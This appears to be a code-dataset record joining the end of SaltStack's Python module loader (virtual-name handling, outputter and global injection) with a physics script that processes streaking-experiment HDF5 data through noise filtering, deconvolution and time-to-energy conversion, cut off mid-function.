self.tag, name
),
exc_info=True
)
return False
except Exception as error:
log.error(
'Failed to import {0} {1}, most likely due to a '
'syntax error:\n'.format(
self.tag, name
),
exc_info=True
)
return False
except SystemExit:
log.error(
'Failed to import {0} {1} as the module called exit()\n'.format(
self.tag, name
),
exc_info=True
)
return False
finally:
sys.path.remove(fpath_dirname)
if hasattr(mod, '__opts__'):
mod.__opts__.update(self.opts)
else:
mod.__opts__ = self.opts
mod.__grains__ = self._grains
mod.__pillar__ = self._pillar
# pack whatever other globals we were asked to
for p_name, p_value in six.iteritems(self.pack):
setattr(mod, p_name, p_value)
module_name = mod.__name__.rsplit('.', 1)[-1]
# Call a module's initialization method if it exists
module_init = getattr(mod, '__init__', None)
if inspect.isfunction(module_init):
try:
module_init(self.opts)
except TypeError as e:
log.error(e)
except Exception:
err_string = '__init__ failed'
log.debug(
'Error loading {0}.{1}: {2}'.format(
self.tag,
module_name,
err_string),
exc_info=True)
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
# if virtual modules are enabled, we need to look for the
# __virtual__() function inside that module and run it.
if self.virtual_enable:
(virtual_ret, module_name, virtual_err) = self.process_virtual(
mod,
module_name,
)
if virtual_err is not None:
log.debug('Error loading {0}.{1}: {2}'.format(self.tag,
module_name,
virtual_err,
))
# if process_virtual returned a non-True value then we are
# supposed to not process this module
if virtual_ret is not True:
# If a module has information about why it could not be loaded, record it
self.missing_modules[module_name] = virtual_err
self.missing_modules[name] = virtual_err
return False
# If this is a proxy minion then MOST modules cannot work. Therefore, require that
# any module that does work with salt-proxy-minion define __proxyenabled__ as a list
# containing the names of the proxy types that the module supports.
#
# Render modules and state modules are OK though
if 'proxy' in self.opts:
if self.tag in ['grains', 'proxy']:
if not hasattr(mod, '__proxyenabled__') or \
(self.opts['proxy']['proxytype'] not in mod.__proxyenabled__ and
'*' not in mod.__proxyenabled__):
err_string = 'not a proxy_minion enabled module'
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
if getattr(mod, '__load__', False) is not False:
log.info(
'The functions from module {0!r} are being loaded from the '
'provided __load__ attribute'.format(
module_name
)
)
mod_dict = salt.utils.odict.OrderedDict()
for attr in getattr(mod, '__load__', dir(mod)):
if attr.startswith('_'):
# private functions are skipped
continue
func = getattr(mod, attr)
if not inspect.isfunction(func):
# Not a function!? Skip it!!!
continue
# Let's get the function name.
# If the module has the __func_alias__ attribute, it must be a
# dictionary mapping in the form of (key -> value):
# <real-func-name> -> <desired-func-name>
#
# It defaults, of course, to the found callable attribute name
# if no alias is defined.
funcname = getattr(mod, '__func_alias__', {}).get(attr, attr)
# Save many references for lookups
self._dict['{0}.{1}'.format(module_name, funcname)] = func
setattr(mod_dict, funcname, func)
mod_dict[funcname] = func
self._apply_outputter(func, mod)
# enforce depends
try:
Depends.enforce_dependencies(self._dict, self.tag)
except RuntimeError as e:
log.info('Depends.enforce_dependencies() failed '
'for reasons: {0}'.format(e))
self.loaded_modules[module_name] = mod_dict
return True
def _load(self, key):
'''
Load a single item if you have it
'''
# if the key doesn't have a '.' then it isn't valid for this mod dict
if not isinstance(key, six.string_types) or '.' not in key:
raise KeyError
mod_name, _ = key.split('.', 1)
if mod_name in self.missing_modules:
return True
# if the modulename isn't in the whitelist, don't bother
if self.whitelist and mod_name not in self.whitelist:
raise KeyError
def _inner_load(mod_name):
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and key in self._dict:
return True
return False
# try to load the module
ret = None
reloaded = False
# re-scan up to once, IOErrors or a failed load cause re-scans of the
# filesystem
while True:
try:
ret = _inner_load(mod_name)
if not reloaded and ret is not True:
self.refresh_file_mapping()
reloaded = True
continue
break
except IOError:
if not reloaded:
self.refresh_file_mapping()
reloaded = True
continue
return ret
def _load_all(self):
'''
Load all of them
'''
for name in self.file_mapping:
if name in self.loaded_files or name in self.missing_modules:
continue
self._load_module(name)
self.loaded = True
def _apply_outputter(self, func, mod):
'''
Apply the __outputter__ variable to the functions
'''
if hasattr(mod, '__outputter__'):
outp = mod.__outputter__
if func.__name__ in outp:
func.__outputter__ = outp[func.__name__]
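# Example of the convention this supports (hypothetical module, not shipped
# with salt): a module declaring
#
#     __outputter__ = {'status': 'yaml'}
#
# gets func.__outputter__ = 'yaml' attached to its 'status' function here,
# which the CLI can later use to pick a display outputter.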
def process_virtual(self, mod, module_name):
'''
Given a loaded module and its default name determine its virtual name
This function returns a tuple. The first value will be either True or
False and will indicate if the module should be loaded or not (i.e. if
it threw an exception while processing its __virtual__ function). The
second value is the determined virtual name, which may be the same as
the value provided. The third value is an error reason string, or None.
The default name can be calculated as follows::
module_name = mod.__name__.rsplit('.', 1)[-1]
'''
# The __virtual__ function will return either a True or False value.
# If it returns a True value it can also set a module level attribute
# named __virtualname__ with the name that the module should be
# referred to as.
#
# This allows us to have things like the pkg module working on all
# platforms under the name 'pkg'. It also allows for modules like
# augeas_cfg to be referred to as 'augeas', which would otherwise have
# namespace collisions. And finally it allows modules to return False
# if they are not intended to run on the given platform or are missing
# dependencies.
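# Sketch of a module using this mechanism (illustrative only; HAS_APT and the
# names below are assumptions, not a real salt module):
#
#     __virtualname__ = 'pkg'
#
#     def __virtual__():
#         if HAS_APT:
#             return __virtualname__
#         return (False, 'apt python bindings are missing')
#
# process_virtual() would then either rename the module to 'pkg' or return
# (False, ..., 'apt python bindings are missing') so that _load_module() can
# record why the module was skipped.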
try:
error_reason = None
if hasattr(mod, '__virtual__') and inspect.isfunction(mod.__virtual__):
try:
start = time.time()
virtual = mod.__virtual__()
if isinstance(virtual, tuple):
error_reason = virtual[1]
virtual = virtual[0]
if self.opts.get('virtual_timer', False):
end = time.time() - start
msg = 'Virtual function took {0} seconds for {1}'.format(
end, module_name)
log.warning(msg)
except Exception as exc:
error_reason = ('Exception raised when processing __virtual__ function'
' for {0}. Module will not be loaded {1}'.format(
module_name, exc))
log.error(error_reason)
virtual = None
# Get the module's virtual name
virtualname = getattr(mod, '__virtualname__', virtual)
if not virtual:
# if __virtual__() evaluates to False then the module
# wasn't meant for this platform or it's not supposed to
# load for some other reason.
# Some modules might accidentally return None and are
# improperly loaded
if virtual is None:
log.warning(
'{0}.__virtual__() is wrongly returning `None`. '
'It should either return `True`, `False` or a new '
'name. If you\'re the developer of the module '
'{1!r}, please fix this.'.format(
mod.__name__,
module_name
)
)
return (False, module_name, error_reason)
# At this point, __virtual__ did not return a
# boolean value, let's check for deprecated usage
# or module renames
if virtual is not True and module_name != virtual:
# The module is renaming itself. Updating the module name
# with the new name
log.trace('Loaded {0} as virtual {1}'.format(
module_name, virtual
))
if not hasattr(mod, '__virtualname__'):
salt.utils.warn_until(
'Hydrogen',
'The {0!r} module is renaming itself in its '
'__virtual__() function ({1} => {2}). Please '
'set its virtual name as the '
'\'__virtualname__\' module attribute. '
'Example: "__virtualname__ = {2!r}"'.format(
mod.__name__,
module_name,
virtual
)
)
if virtualname != virtual:
# The __virtualname__ attribute does not match what's
# being returned by the __virtual__() function. This
# should be considered an error.
log.error(
'The module {0!r} is showing some bad usage. Its '
'__virtualname__ attribute is set to {1!r} yet the '
'__virtual__() function is returning {2!r}. These '
'values should match!'.format(
mod.__name__,
virtualname,
virtual
)
)
module_name = virtualname
# If the __virtual__ function returns True and __virtualname__ is set then use it
elif virtual is True and virtualname != module_name:
if virtualname is not True:
module_name = virtualname
except KeyError:
# Key errors come out of the virtual function when passing
# in incomplete grains sets, these can be safely ignored
# and logged to debug, still, it includes the traceback to
# help debugging.
log.debug(
'KeyError when loading {0}'.format(module_name),
exc_info=True
)
except Exception:
# If the module throws an exception during __virtual__()
# then log the information and continue to the next.
log.error(
'Failed to read the virtual function for '
'{0}: {1}'.format(
self.tag, module_name
),
exc_info=True
)
return (False, module_name, error_reason)
return (True, module_name, None)
def global_injector_decorator(inject_globals):
'''
Decorator used by the LazyLoader to inject globals into a function at
execute time.
globals
Dictionary with global variables to inject
'''
def inner_decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
with context.func_globals_inject(f, **inject_globals):
return f(*args, **kwargs)
return wrapper
return inner_decorator
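# Rough usage sketch (assumed, not part of the loader itself):
#
#     inject = global_injector_decorator({'__jid__': '20150101000000000000'})
#     wrapped = inject(some_loaded_function)
#     wrapped()   # runs with __jid__ temporarily injected into its globals
#
# This is exactly what LazyLoader.__getitem__ does when inject_globals is set.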
|
apache-2.0
| 7,259,339,349,541,373,000 | 33.71419 | 118 | 0.503326 | false |
aolindahl/streaking
|
process_hdf5.py
|
1
|
46151
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 8 15:37:51 2015
@author: Anton O Lindahl
"""
import h5py
import argparse
import matplotlib.pyplot as plt
import numpy as np
import time
import os
import sys
import lmfit
import warnings
from aolPyModules import wiener, wavelet_filter
import time_to_energy_conversion as tof_to_energy
from aolPyModules import plotting as aol_plotting
import area_fill
prompt_roi = [1.508, 1.535]
streak_time_roi = [1.57, 1.66]
wt_th = 0.03
energy_scale_eV = np.linspace(40, 160, 2**9)
time_stamp = 'time_stamp'
data_dir = 'h5_files'
h5_file_name_template = data_dir + '/run{}_all.h5'
response_file_name = data_dir + '/response.h5'
nois_file_name = data_dir + '/noise.h5'
tof_to_energy_conversion_file_name = data_dir + '/time_to_energy.h5'
def h5_file_name_funk(run):
return h5_file_name_template.format(run)
def update_progress(i_evt, n_events, verbose=True):
if (verbose and
((i_evt % (n_events / 100) == 0) or (i_evt == n_events-1))):
progress = (100 * i_evt) / (n_events - 1)
num_squares = 40
base_string = '\r[{:' + str(num_squares) + '}] {}%'
print base_string.format('#'*(progress * num_squares / 100), progress),
sys.stdout.flush()
def list_hdf5_content(group, indent=' '):
for k, v in group.iteritems():
print '{}"{}"'.format(indent, k),
if isinstance(v, h5py.Group):
print 'group with members:'
list_hdf5_content(v, indent=indent + ' ')
elif isinstance(v, h5py.Dataset):
print '\t{} {}'.format(v.shape, v.dtype)
def make_dataset(h5, name, shape, dtype=np.float):
try:
dset = h5.require_dataset(name, shape=shape,
dtype=dtype, exact=True)
except TypeError:
del h5[name]
dset = h5.create_dataset(name, shape=shape, dtype=np.float)
if time_stamp not in dset.attrs.keys():
dset.attrs.create(time_stamp, 0)
return dset
def make_group(h5, name):
try:
group = h5.require_group(name)
except TypeError:
del h5[name]
group = h5.create_group(name)
if time_stamp not in group.attrs.keys():
group.attrs.create(time_stamp, 0)
return group
def older(dset, dset_list):
if (isinstance(dset_list, h5py.Dataset) or
isinstance(dset_list, h5py.Group)):
return dset.attrs[time_stamp] < dset_list.attrs[time_stamp]
return np.any([dset.attrs[time_stamp] < d.attrs[time_stamp] for
d in dset_list])
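# The helpers above (make_dataset/make_group/older) implement a simple
# dependency-tracking pattern: every dataset or group carries a 'time_stamp'
# attribute and is recomputed only when it is older than its inputs. A minimal
# sketch of the intended use (compute_derived is a hypothetical function):
#
#     dset = make_dataset(h5, 'derived', (n_events,))
#     if older(dset, h5['raw']):
#         dset[:] = compute_derived(h5['raw'])
#         dset.attrs[time_stamp] = time.time()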
class Timer_object:
def __init__(self, t):
self.attrs = {'time_stamp': t}
class Tims_stamp_warning(Warning):
pass
def time_stamp_object(h5_object):
try:
h5_object.attrs['time_stamp'] = time.time()
except:
warnings.warn('Could not time stamp the object {}.'.format(
repr(h5_object)))
def get_response(plot=False, verbose=0):
try:
with h5py.File(response_file_name, 'r') as f:
response = f['signal'].value
t = f['signal'].attrs[time_stamp]
except IOError:
if verbose > 0:
print 'Could not open response file. Trying to make it.'
response, t = construct_response(verbose=verbose)
if plot:
with h5py.File(response_file_name, 'r') as f:
time_scale = f['time_scale'].value
plt.figure('response')
plt.clf()
plt.plot(time_scale, response)
return response, t
def construct_response(plot=False, verbose=0):
# The Kr runs
runs = [132, 133, 134, 135, 136]
if verbose > 0:
print 'Loading Kr files for prompt determination.'
h5_file_names = [h5_file_name_template.format(run) for run in runs]
h5_list = []
for file_name in h5_file_names:
update_run_contained_derived_data(file_name, verbose=verbose)
h5_list.append(h5py.File(file_name, 'r+'))
time_scale = h5_list[0]['raw/time_scale'].value
response = np.zeros_like(time_scale)
n_shots = 0
sl = slice(time_scale.searchsorted(prompt_roi[0]),
time_scale.searchsorted(prompt_roi[1], side='right'))
for h5 in h5_list:
response[sl] += h5['raw/time_signal'][:, sl].sum(0)
n_shots += h5['raw/event_time_s'].shape[0]
response /= n_shots
response[sl] = wiener.edgeSmoothing(response[sl], smoothPoints=15)
response /= response.sum()
with h5py.File(response_file_name, 'w') as res_file:
dset = res_file.create_dataset('signal', data=response)
dset.attrs.create(time_stamp, time.time())
res_file.create_dataset('time_scale', data=time_scale)
return get_response(plot=plot, verbose=verbose)
def get_file_names_for_noise_spectrum():
return ['/'.join([data_dir, f]) for f in os.listdir(data_dir) if
f.startswith('run') and f.endswith('_all.h5')]
def get_nois_spectrum(plot=False, verbose=0):
try:
with h5py.File(nois_file_name, 'r') as f:
pass
new_noise = False
except IOError:
if verbose > 0:
print 'Could not open noise file. Trying to make it.',
print 'In "get_nois_spectrum()".'
construct_nois_spectrum(plot=plot, verbose=verbose)
new_noise = True
if not new_noise:
make_new_noise = False
with h5py.File(nois_file_name, 'r') as f:
noise = f['noise']
h5_file_names = get_file_names_for_noise_spectrum()
for h5_name in h5_file_names:
with h5py.File(h5_name, 'r') as h5:
if older(noise, h5['raw']):
make_new_noise = True
if verbose > 0:
print 'Noise was made earlier than the raw data',
print 'in the file', h5_name, 'Make new noise.'
break
elif False:
print 'Noise was made later than the raw data in',
print 'the file', h5_name
if make_new_noise:
construct_nois_spectrum(plot=plot, verbose=verbose)
with h5py.File(nois_file_name, 'r') as f:
noise = f['noise']
return noise.value, noise.attrs['time_stamp']
def construct_nois_spectrum(plot=False, verbose=0):
h5_file_names = get_file_names_for_noise_spectrum()
for file_name in h5_file_names:
update_run_contained_derived_data(file_name)
empty_shots = []
for i, h5_name in enumerate(h5_file_names):
with h5py.File(h5_name, 'r') as h5:
time_signal_dset = h5['raw/time_signal']
try:
max_signal = h5['max_signal'].value
except KeyError:
max_signal = np.max(time_signal_dset.value, axis=1)
no_x_rays = max_signal < 0.04
if no_x_rays.sum() > 0:
empty_shots.extend(time_signal_dset[no_x_rays, :])
if i == 0:
time_scale = h5['raw/time_scale'].value
if verbose > 0:
print h5_name, 'has', no_x_rays.sum(), 'empty shots'
empty_shots = np.array(empty_shots)
# print len(empty_shots)
# plt.figure('snr')
# plt.clf()
# for shot in empty_shots[:]:
# plt.plot(time_scale, shot)
freq = (np.linspace(0., 1., len(time_scale)) *
1e-3/(time_scale[1] - time_scale[0]))
fft_empty_shots = np.fft.fft(empty_shots, axis=1)
amp = np.mean(np.abs(fft_empty_shots)**2, axis=0)
wt_amp = amp[:]
wt_amp = wavelet_filter.wavelet_filt(amp[1:], thresh=wt_th)
wt_amp[1:] = (wt_amp[1:] + wt_amp[-1:0:-1]) / 2
# plt.figure('fft')
# plt.clf()
# plt.plot(freq, amp)
# plt.plot(freq, wt_amp, 'r')
with h5py.File(nois_file_name, 'w') as f:
dset = f.create_dataset('noise', data=wt_amp)
dset.attrs.create('time_stamp', time.time())
f.create_dataset('freq', data=freq)
return get_nois_spectrum()
def construct_snr_spectrum(h5, plot=False):
noise, t = get_nois_spectrum()
sig_spec = h5['fft_spectrum_mean'].value
freq = h5['fft_freq_axis'].value
wt_spec = wavelet_filter.wavelet_filt(sig_spec, thresh=wt_th)
wt_spec[1:] = (wt_spec[1:] + wt_spec[-1:0:-1]) / 2
snr = (wt_spec - noise) / noise
if plot:
plt.figure('signal and noise')
plt.clf()
plt.semilogy(freq, sig_spec, label='signal')
plt.semilogy(freq, noise, label='noise')
plt.semilogy(freq, wt_spec, label='wt signal')
plt.semilogy(freq, snr, label='snr')
plt.legend(loc='best')
return snr
def check_tof_to_energy_conversion_matrix(plot=False, verbose=0):
try:
with h5py.File(tof_to_energy_conversion_file_name, 'r'):
pass
except IOError:
if verbose > 0:
print 'Could not open the file. Making the conversion matrix.'
construc_tof_to_energy_conversion_matrix(plot=plot, verbose=verbose)
_, h5_dict, _ = tof_to_energy.load_tof_to_energy_data(verbose=verbose)
with h5py.File(tof_to_energy_conversion_file_name, 'r') as trans_h5:
if not older(
trans_h5['matrix'],
[h5['streak_peak_integral'] for h5 in h5_dict.itervalues()] +
[Timer_object(1437117486)]):
return
if verbose > 0:
print 'Conversion too old, remaking it.'
construc_tof_to_energy_conversion_matrix(plot=plot, verbose=verbose)
def construc_tof_to_energy_conversion_matrix(plot=False, verbose=0):
M, t, E, time_to_energy_params, tof_prediction_params = \
tof_to_energy.make_tof_to_energy_matrix(
energy_scale_eV=energy_scale_eV, plot=plot, verbose=verbose)
with h5py.File(tof_to_energy_conversion_file_name, 'w') as h5:
dset = h5.create_dataset('matrix', data=M)
dset.attrs.create('time_stamp', time.time())
dset = h5.create_dataset('time_scale', data=t)
dset.attrs.create('time_stamp', time.time())
dset = h5.create_dataset('energy_scale_eV', data=E)
dset.attrs.create('time_stamp', time.time())
for k in time_to_energy_params:
dset = h5.create_dataset(k, data=time_to_energy_params[k].value)
dset.attrs.create('time_stamp', time.time())
for k in tof_prediction_params:
dset = h5.require_dataset(k, (), np.float)
dset[()] = tof_prediction_params[k].value
dset.attrs.create('time_stamp', time.time())
def open_hdf5_file(file_name, plot=False, verbose=0):
try:
# Open the file
h5 = h5py.File(file_name, 'r+')
except BaseException as e:
print 'Could not open the specified hdf5 file "{}".'.format(
file_name)
print 'Message was: {}'.format(e.message)
return -1
return h5
def get_com(x, y):
idx_l, idx_h = fwxm(x, y, 0.0, return_data='idx')
sl = slice(idx_l, idx_h)
return ((x[sl] * y[sl]).sum()) / (y[sl].sum())
def fwxm(x, y, fraction=0.5, return_data=''):
y_max = y.max()
idx_max = y.argmax()
y_f = y_max * fraction
for i in range(idx_max, -1, -1):
if y[i] < y_f:
idx_low = i
break
else:
idx_low = idx_max
for i in range(idx_max, len(x)):
if y[i] < y_f:
idx_high = i
break
else:
idx_high = idx_max
if return_data == 'idx':
return idx_low, idx_high
if return_data == 'limits':
return x[idx_low], x[idx_high]
return (x[idx_low] + x[idx_high]) / 2, x[idx_high] - x[idx_low]
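# Worked example (illustrative numbers): for x = [0, 1, 2, 3, 4] and
# y = [0, 1, 2, 1, 0] with fraction=0.5 the threshold is 1.0; the first samples
# strictly below it on either side are x=0 and x=4, so fwxm returns (2, 4).
# Note that the bounds are the samples just outside the peak, not interpolated
# crossings.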
def get_trace_bounds(x, y,
threshold=0.0, min_width=2,
energy_offset=0,
useRel=False, threshold_rel=0.5,
roi=slice(None)):
amp = y[roi]
scale = x[roi]
dx = np.mean(np.diff(x))
if useRel:
threshold_temp = threshold_rel * np.max(amp[np.isfinite(amp)])
if threshold_temp < threshold:
return [np.nan] * 3
else:
threshold_V = threshold_temp
else:
threshold_V = threshold
nPoints = np.round(min_width/dx)
i_min = 0
for i in range(1, amp.size):
if amp[i] < threshold_V:
i_min = i
continue
if i-i_min >= nPoints:
break
else:
return [np.nan] * 3
i_max = amp.size - 1
for i in range(amp.size-1, -1, -1):
if amp[i] < threshold_V:
i_max = i
continue
if i_max-i >= nPoints:
break
else:
return [np.nan] * 3
if i_min == 0 and i_max == amp.size - 1:
return [np.nan] * 3
# print 'min =', min, 'max =', max
val_max = (scale[i_max] + (threshold_V - amp[i_max]) *
(scale[i_max] - scale[i_max - 1]) /
(amp[i_max] - amp[i_max - 1]))
val_min = (scale[i_min] + (threshold_V - amp[i_min]) *
(scale[i_min + 1] - scale[i_min]) /
(amp[i_min + 1] - amp[i_min]))
return val_min, val_max, threshold_V
def update_run_contained_derived_data(file_name, plot=False, verbose=0):
"""Update derived data based on information only in given file.
Add some derived datasetd to the hdf5 file based on the raw data in the
file. The added datasets are:
- Mean of the FEE gas detectors for each shot: fee_mean
- Maximum TOF waveform signal for each shot: max_signal
- Frequency spectrum averaged over all shots: fft_spectrum_mean
- The corresponding frequency axis: fft_freq_axis
- BC2 energy calculated from the beam position: energy_BC2_MeV
- L3 energy corrected based on the BC2 energy: energy_L3_corrected_MeV
"""
if verbose > 0:
print 'Entering "update_run_contained_derived_data()" ',
print 'with file_name={}'.format(file_name)
h5 = open_hdf5_file(file_name, plot, verbose)
raw_group = h5['raw']
n_events = raw_group['event_time_s'].shape[0]
# Make the fee data set
raw_fee_dset = raw_group['FEE_energy_mJ']
fee_mean_dset = make_dataset(h5, 'fee_mean', (n_events,))
if older(fee_mean_dset, raw_group):
if verbose > 0:
print 'Updating fee mean dataset'
fee_mean_dset[:] = raw_fee_dset[:, 0: 4].mean(1)
fee_mean_dset.attrs[time_stamp] = time.time()
# Make max signal dataset
time_signal_dset = raw_group['time_signal']
max_sig_dset = make_dataset(h5, 'max_signal', (n_events,))
if older(max_sig_dset, raw_group):
if verbose > 0:
print 'Get the maximum signal for each shot.'
max_sig_dset[:] = np.max(time_signal_dset, axis=1)
max_sig_dset.attrs['time_stamp'] = time.time()
# Make the frequency spectrum
time_scale = raw_group['time_scale'].value
spectrum_dset = make_dataset(h5, 'fft_spectrum_mean', time_scale.shape)
if older(spectrum_dset, [raw_group, max_sig_dset]):
if verbose > 0:
print 'Compute the frequency spectrum of the data.'
max_signal = max_sig_dset.value
use = max_signal > np.sort(max_signal)[-500:][0]
signal = time_signal_dset[use, :]
spectrum_dset[:] = np.mean(np.abs(np.fft.fft(signal, axis=1))**2,
axis=0)
spectrum_dset.attrs['time_stamp'] = time.time()
freq_axis_dset = make_dataset(h5, 'fft_freq_axis', time_scale.shape)
if older(freq_axis_dset, raw_group):
if verbose > 0:
print 'Updating the frequency axis.'
freq_axis_dset[:] = (np.linspace(0., 1e-3, len(time_scale)) /
(time_scale[1] - time_scale[0]))
freq_axis_dset.attrs['time_stamp'] = time.time()
# Calculate the BC2 energy
bc2_energy_dset = make_dataset(h5, 'energy_BC2_MeV', (n_events, ))
if older(bc2_energy_dset, raw_group):
if verbose > 0:
print 'Calculating BC2 energy for the bpm reading.'
# Values comes from a mail from Timothy Maxwell
# The nominal BC2 energy is 5 GeV (was at least when this data was
# recorded). The measurement is the relative offset of the beam
# position in a BPM. The dispersion value is -364.7 mm.
bc2_energy_dset[:] = 5e3 * (1. - raw_group['position_BC2_mm'][:] /
364.7)
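# e.g. a +3.647 mm offset gives 5e3 * (1 - 3.647 / 364.7) = 4950 MeV,
# i.e. a 1 % energy decrease (illustrative number, not taken from the data).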
bc2_energy_dset.attrs['time_stamp'] = time.time()
# Calculate the corrected L3 energy
l3_energy_cor_dset = make_dataset(h5, 'energy_L3_corrected_MeV',
(n_events, ))
if older(l3_energy_cor_dset, [raw_group, bc2_energy_dset,
Timer_object(1434096408)]):
if verbose > 0:
print 'Calculating corrected L3 energy.'
l3_energy_cor_dset[:] = (raw_group['energy_L3_MeV'][:] -
(bc2_energy_dset[:] - 5000))
l3_energy_cor_dset.attrs['time_stamp'] = time.time()
# Make the phase cavity time filter
pct_filter_dset = make_dataset(h5, 'pct_filter', (n_events, ),
dtype=bool)
if older(pct_filter_dset, [raw_group, Timer_object(0)]):
print h5.filename
pct0 = raw_group['phase_cavity_times'][:, 0]
pct_filter_dset[:] = (0.4 < pct0) & (pct0 < 1.2)
pct_filter_dset.attrs[time_stamp] = time.time()
h5.close()
def update_with_noise_and_response(file_name, plot=False, verbose=0):
"""Update derived data based on noise and response spectra.
Noise spectrum and detector response are determined from many runs. With
these spectra a number of new parameters can be derived. These are:
- snr_spectrum: Signal to Noise ratio spectrum based on the given noise \
spectrum and the average spectrum in the current run.
- filtered_time_signal: Wiener deconvolution of the time signal based on \
the signal to noise ratio and the detector response function.
- streak_peak_center: Center of the streaking peak in the sense of the \
center of mass of the peak in a given ROI. Based on the deconvoluted \
signal.
- streak_peak_integral: Photoline intensity by integration of the \
deconvoluted spectrum in time domain.
"""
# Make sure that the run contained information is up to date.
update_run_contained_derived_data(file_name, plot, verbose-1)
# Open the file.
h5 = open_hdf5_file(file_name, plot, verbose)
raw_group = h5['raw']
n_events = raw_group['event_time_s'].shape[0]
time_scale = raw_group['time_scale'].value
# Make signal to noise ratio.
snr_dset = make_dataset(h5, 'snr_spectrum', time_scale.shape)
spectrum_dset = h5['fft_spectrum_mean']
if older(snr_dset, [spectrum_dset, raw_group, Timer_object(1434015914)]):
if verbose > 0:
print 'Updating the signal to noise ratio.',
print ' In "update_with_noise_and_response()"',
print ' with file_name={}'.format(file_name)
snr_dset[:] = construct_snr_spectrum(h5, plot=plot)
snr_dset.attrs['time_stamp'] = time.time()
# Deconvolute the response function
time_signal_dset = raw_group['time_signal']
deconv_time_signal_dset = make_dataset(h5, 'filtered_time_signal',
time_signal_dset.shape)
if older(deconv_time_signal_dset, [raw_group, snr_dset]):
response, t_response = get_response(plot=plot, verbose=verbose-1)
if verbose > 0:
print 'Deconvolving traces.'
print ' In "update_with_noise_and_response()"',
print ' with file_name={}'.format(file_name),
print ' {} events to process.'.format(n_events)
deconvolver = wiener.Deconcolver(snr_dset.value, response)
for i_evt in range(n_events):
deconv_time_signal_dset[i_evt, :] = deconvolver.deconvolve(
time_signal_dset[i_evt, :])
update_progress(i_evt, n_events, verbose)
print ''
deconv_time_signal_dset.attrs['time_stamp'] = time.time()
# Calculate the center of mass of the streak peak
time_com_dset = make_dataset(h5, 'streak_peak_center', (n_events, ))
photo_line_intensity_dset = make_dataset(h5, 'streak_peak_integral',
(n_events, ))
if older(time_com_dset, [deconv_time_signal_dset,
Timer_object(1443006988)]):
if verbose > 0:
print 'Calculating streak peak center in time.',
print ' In "update_with_noise_and_response()"',
print ' with file_name={}'.format(file_name)
streak_sl = slice(np.searchsorted(time_scale, streak_time_roi[0]),
np.searchsorted(time_scale, streak_time_roi[1],
side='right'))
time_scale_streak = time_scale[streak_sl]
####
# Center of mass calculation
# for i_evt in range(n_events):
# time_com_dset[i_evt] = get_com(
# time_scale_streak,
# deconv_time_signal_dset[i_evt, streak_sl])
# update_progress(i_evt, n_events, verbose)
####
# Fit of Gaussian
deconv_time_signal = deconv_time_signal_dset.value
time_com = np.zeros(time_com_dset.shape)
photo_line_intensity = np.zeros(photo_line_intensity_dset.shape)
mean_signal = deconv_time_signal[:, streak_sl].mean(axis=0)
mod = lmfit.models.GaussianModel()
params = lmfit.Parameters()
params.add_many(('amplitude', 1, True, 0),
('center', time_scale_streak[np.argmax(mean_signal)],
True, min(time_scale_streak), max(time_scale_streak)),
('sigma', 1e-3, True, 0))
# fit to mean in order to get start parameters for the shot fits
out = mod.fit(mean_signal, x=time_scale_streak, params=params)
for k in params:
params[k].value = out.params[k].value
for i_evt in range(n_events):
out = mod.fit(deconv_time_signal[i_evt, streak_sl],
params, x=time_scale_streak)
time_com[i_evt] = out.params['center'].value
photo_line_intensity[i_evt] = out.params['amplitude'].value
update_progress(i_evt, n_events, verbose)
if plot:
time_scale_streak = time_scale[streak_sl]
plt.figure('peak finding time domain')
plt.clf()
plt.plot(time_scale_streak, mean_signal)
plt.plot(time_scale_streak, out.best_fit)
if verbose > 0:
print ''
time_com_dset[:] = time_com
time_com_dset.attrs['time_stamp'] = time.time()
photo_line_intensity_dset[:] = photo_line_intensity
photo_line_intensity_dset.attrs['time_stamp'] = time.time()
h5.close()
def update_with_time_to_energy_conversion(file_name, plot=False, verbose=0):
""" Make derived data based on time to energy conversion."""
update_with_noise_and_response(file_name, plot, verbose)
h5 = open_hdf5_file(file_name, plot, verbose)
raw_group = h5['raw']
n_events = raw_group['event_time_s'].shape[0]
deconv_time_signal_dset = h5['filtered_time_signal']
energy_scale_dset = make_dataset(h5, 'energy_scale_eV',
energy_scale_eV.shape)
energy_trace_dset = make_dataset(h5, 'energy_signal',
(n_events, len(energy_scale_eV)))
check_tof_to_energy_conversion_matrix(verbose=verbose)
with h5py.File(tof_to_energy_conversion_file_name, 'r') as tof_to_e_h5:
if older(energy_scale_dset, [tof_to_e_h5['matrix'],
deconv_time_signal_dset,
Timer_object(1443190000)]):
if verbose > 0:
print 'Updating time to energy conversion.',
print ' In "update_with_time_to_energy_conversion()"',
print ' with {}'.format(file_name)
# Get the transformation matrix from file
M = tof_to_e_h5['matrix'].value
# Update the energy scale
energy_scale_dset[:] = tof_to_e_h5['energy_scale_eV'].value
energy_scale_dset.attrs['time_stamp'] = time.time()
# Get the photon energy prediction parameters
params = (tof_to_energy.photon_energy_params() +
tof_to_energy.tof_prediction_params())
for k in params:
params[k].value = tof_to_e_h5[k].value
if verbose > 0:
print 'Computing energy spectra.'
for i_evt in range(n_events):
# Energy spectra
energy_trace_dset[i_evt, :] = M.dot(
deconv_time_signal_dset[i_evt, :])
update_progress(i_evt, n_events, verbose)
if verbose > 0:
print ''
energy_trace_dset.attrs['time_stamp'] = time.time()
# Calculate energy trace properties
spectral_properties_group = h5.require_group('spectral_properties')
spectral_center_dset = make_dataset(spectral_properties_group,
'center_eV', (n_events, ))
spectral_width_dset = make_dataset(spectral_properties_group,
'width_eV', (n_events, ))
spectral_threshold_dset = make_dataset(spectral_properties_group,
'threshold', (n_events, ))
spectral_gaussian_center_dset = make_dataset(spectral_properties_group,
'gaussian_center',
(n_events,))
if older(spectral_center_dset, [energy_trace_dset,
Timer_object(1443421560)]):
energy_scale = energy_scale_dset[:]
sl = slice(np.searchsorted(energy_scale, 75),
np.searchsorted(energy_scale, 125))
energy_scale = energy_scale[sl]
model = lmfit.models.GaussianModel()
if verbose > 0:
print 'Calculating spectral center and width:',
print 'In "update_with_time_to_energy_conversion()"',
print 'with {}'.format(file_name)
for i_evt in range(n_events):
energy_trace = energy_trace_dset[i_evt, sl]
t_start, t_end, spectral_threshold_dset[i_evt] = \
get_trace_bounds(energy_scale,
energy_trace,
threshold=8e-5,
min_width=3,
# useRel=True,
# threshold_rel=0.3
)
center = (t_start + t_end) / 2
